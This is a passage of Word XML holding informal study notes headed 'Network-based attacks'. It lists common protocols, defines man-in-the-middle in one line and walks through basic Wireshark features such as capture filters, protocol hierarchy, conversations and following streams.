    <w:p w14:paraId="75F420F0" w14:textId="25A9E370" w:rsidR="001270EB" w:rsidRDefault="001270EB" w:rsidP="001270EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NETWORK-BASED ATTACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419BFE4" w14:textId="77777777" w:rsidR="006503A4" w:rsidRDefault="006503A4" w:rsidP="001270EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9FF8BA" w14:textId="1BA244F7" w:rsidR="006503A4" w:rsidRDefault="00A6673D" w:rsidP="00A6673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC2AC7" w14:textId="058CE954" w:rsidR="00A6673D" w:rsidRDefault="00A6673D" w:rsidP="00A6673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E703CFD" w14:textId="75938E6A" w:rsidR="00A6673D" w:rsidRDefault="00A6673D" w:rsidP="00A6673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D451981" w14:textId="40A04331" w:rsidR="00A6673D" w:rsidRDefault="00A6673D" w:rsidP="00A6673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57E0E7" w14:textId="04DA7A33" w:rsidR="00A6673D" w:rsidRDefault="00A6673D" w:rsidP="00A6673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16147172" w14:textId="301B3ABA" w:rsidR="00A6673D" w:rsidRDefault="00A6673D" w:rsidP="00A6673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552B342" w14:textId="77777777" w:rsidR="004617D8" w:rsidRDefault="004617D8" w:rsidP="004617D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D25E99" w14:textId="314D81FE" w:rsidR="00282B27" w:rsidRPr="000238D0" w:rsidRDefault="004617D8" w:rsidP="000238D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A lot of these services can be exploited in network-based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205315EE" w14:textId="3DA11D91" w:rsidR="00317DDF" w:rsidRPr="000238D0" w:rsidRDefault="00282B27" w:rsidP="000238D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When packets are sent out, they are encased in either three different protocols </w:t>
      </w:r>
      <w:r w:rsidR="00317DDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are built in </w:t>
      </w:r>
      <w:r w:rsidR="00317DDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> electromagnetic signals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7128F" w14:textId="3899FAAA" w:rsidR="00993EB0" w:rsidRDefault="00317DDF" w:rsidP="00993EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Man-in-the-middle: Intercept packets that are routed to different areas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472829A" w14:textId="77777777" w:rsidR="000238D0" w:rsidRPr="000238D0" w:rsidRDefault="000238D0" w:rsidP="000238D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3698D797" w14:textId="7DF8EBC5" w:rsidR="00993EB0" w:rsidRDefault="00993EB0" w:rsidP="00993EB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3077FD" w14:textId="0C8C98E8" w:rsidR="00993EB0" w:rsidRDefault="00993EB0" w:rsidP="00993EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Capture some packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A601961" w14:textId="531BE05A" w:rsidR="00993EB0" w:rsidRDefault="00993EB0" w:rsidP="00993EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Make sure you’re listening on the correct network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF0BAC" w14:textId="5BC0E6BA" w:rsidR="00993EB0" w:rsidRDefault="00953997" w:rsidP="00993EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Saved packet capture sessions will be saved as a .pcap file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B015C" w14:textId="54749EDA" w:rsidR="00FE1450" w:rsidRDefault="00FE1450" w:rsidP="00993EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">I really don’t need many notes on this, </w:t>
      </w:r>
      <w:r w:rsidR="006A3FD6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> easy asf</w:t>
      </w:r>
      <w:r w:rsidR="009A1DB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858C6B7" w14:textId="77777777" w:rsidR="009A1DB3" w:rsidRDefault="009A1DB3" w:rsidP="009A1DB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB8D331" w14:textId="7DA18729" w:rsidR="009A1DB3" w:rsidRPr="00225E14" w:rsidRDefault="009A1DB3" w:rsidP="00225E14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>View &gt; Name Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA5201" w14:textId="38CB2874" w:rsidR="009A1DB3" w:rsidRDefault="009A1DB3" w:rsidP="009A1DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can resolve MAC and Net</w:t>
      </w:r>
      <w:r w:rsidR="00225E14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>work addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B3B3C" w14:textId="33CA23AA" w:rsidR="00941265" w:rsidRDefault="00941265" w:rsidP="00941265">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>View &gt; Coloring Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29256CD2" w14:textId="5606B60D" w:rsidR="00941265" w:rsidRDefault="00941265" w:rsidP="00941265">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>View different packets and what they do</w:t>
      </w:r>
      <w:r w:rsidR="00923FD6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00090651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>color-coded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33518DC3" w14:textId="59EF5C0C" w:rsidR="00551170" w:rsidRDefault="00551170" w:rsidP="00551170">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00090651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161686FC" w14:textId="304D819D" w:rsidR="00090651" w:rsidRDefault="00090651" w:rsidP="00090651">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Choose different interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08223C" w14:textId="04E4D817" w:rsidR="00090651" w:rsidRDefault="00090651" w:rsidP="00090651">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Apply capture filters to pinpoint specific types of packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC0A52" w14:textId="496E298D" w:rsidR="00BE35C5" w:rsidRDefault="00BE35C5" w:rsidP="00090651">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Input/Output/etc. &amp; collect different schtuff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24317DCC" w14:textId="0E768715" w:rsidR="00270C1B" w:rsidRDefault="005A310B" w:rsidP="00270C1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Statistics &gt; Protocol Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67E121" w14:textId="4EC503DF" w:rsidR="005A310B" w:rsidRDefault="005A310B" w:rsidP="005A310B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Divvies up all the packet capture logs on the current capture and separate them into the different types of packets they are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F31BE" w14:textId="26120EDD" w:rsidR="005A310B" w:rsidRDefault="005A310B" w:rsidP="005A310B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Provides statistics to these packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8C964" w14:textId="456F719C" w:rsidR="000A43D0" w:rsidRDefault="007A508C" w:rsidP="000A43D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Statistics &gt; Conversations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461A0C6" w14:textId="50F8D3E4" w:rsidR="007A508C" w:rsidRDefault="007A508C" w:rsidP="007A508C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Which machine talked to which machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE905EE" w14:textId="1A6322FF" w:rsidR="007A508C" w:rsidRDefault="007A508C" w:rsidP="007A508C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We can separate this by MAC/IP address, enabling name resolution is helpful in this step</w:t>
      </w:r>
      <w:r w:rsidR="00977577">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDB5A5" w14:textId="70E19D79" w:rsidR="00977577" w:rsidRDefault="00977577" w:rsidP="00977577">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Statistics &gt; Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51305EB9" w14:textId="179B3285" w:rsidR="00977577" w:rsidRDefault="00977577" w:rsidP="00977577">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">View domains and all that, pretty </w:t>
      </w:r>
      <w:r w:rsidR="00AF6577">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conversations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C89BC68" w14:textId="54BA16C4" w:rsidR="00977577" w:rsidRDefault="000238D0" w:rsidP="000238D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Flow Graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11344729" w14:textId="19DFE7C3" w:rsidR="000238D0" w:rsidRDefault="000238D0" w:rsidP="000238D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Visible graphs for packet captures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070164A5" w14:textId="217A3E3D" w:rsidR="006A3FD6" w:rsidRDefault="00B2079C" w:rsidP="00B2079C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Date Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BBF3E" w14:textId="0547F772" w:rsidR="0079055A" w:rsidRDefault="0079055A" w:rsidP="0079055A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Not necessarily useful since computers generally act fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD9CCF" w14:textId="11079759" w:rsidR="0079055A" w:rsidRPr="000B3C3C" w:rsidRDefault="00AD28A9" w:rsidP="000B3C3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Add source/destination port </w:t>
      </w:r>
      <w:r w:rsidR="000B3C3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">field </w:t>
      </w:r>
      <w:r w:rsidRPr="000B3C3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="000B3C3C" w:rsidRPr="000B3C3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>understand how devices are communicating with each other and which ports they are utilizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893769F" w14:textId="29BA0807" w:rsidR="000B3C3C" w:rsidRDefault="0078383A" w:rsidP="0079055A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Follow different streams which can help understand where the</w:t>
      </w:r>
      <w:r w:rsidR="007A465D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A465D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>conversations are leading to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80F8BA" w14:textId="7294ADA1" w:rsidR="00C10A57" w:rsidRDefault="00C10A57" w:rsidP="00C10A57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
